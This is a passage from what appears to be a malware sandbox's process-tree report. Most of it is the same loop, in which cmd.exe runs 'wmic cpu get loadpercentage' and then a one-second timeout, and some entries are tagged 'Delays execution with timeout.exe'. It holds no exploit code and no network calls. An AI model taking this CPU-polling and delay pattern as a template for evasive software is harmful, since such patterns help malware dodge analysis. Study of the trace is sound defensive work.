- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4700
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1960
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2312
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2192
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4704
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4728
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2836
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4212
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5100
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4732
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4240
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2584
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1168
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4048
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2580
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2068
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4592
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2636
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:96
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:596
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5040
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2204
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3300
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2148
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:656
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3900
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:892
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4740
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2904
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1724
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2872
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1364
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1604
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4400
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3960
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3988
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:756
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4124
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:208
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:60
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5060
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:864
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2080
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4636
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1864
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3824
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1872
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2176
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1216
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3452
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2664
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1960
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4452
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2192
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4632
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2840
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:316
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4380
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4928
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3292
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3684
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2068
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3164
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4584
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4592
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:596
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3296
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4344
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2124
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2728
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2148
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4172
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2236
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1040
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4740
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2628
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2872
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4304
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2700
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1364
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1796
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3984
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3960
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:212
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4660
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:60
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4056
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4068
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4668
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1332
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1896
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2744
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3136
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:916
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4976
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1716
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4128
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:600
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3628
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2632
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3588
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4640
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1868
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3068
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4236
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4620
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4092
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1140
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4568
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5116
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:388
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4708
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2764
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1608
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1268
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3480
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1028
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:408
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4208
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4368
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1412
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2760
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1612
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2128
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2872
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3092
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3064
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1176
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2468
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4296
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:212
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:208
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:864
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4868
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2080
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3740
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1864
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2188
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2096
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:64
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1732
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1892
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4356
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:32
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5024
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3492
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:988
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5020
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2688
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3540
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4628
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:776
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2676
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4584
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:948
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:596
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2232
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3144
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4344
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:656
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1012
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2148
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2976
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2608
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3140
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2824
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1236
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1364
- - C:\Windows\System32\Wbem\WMIC.exe
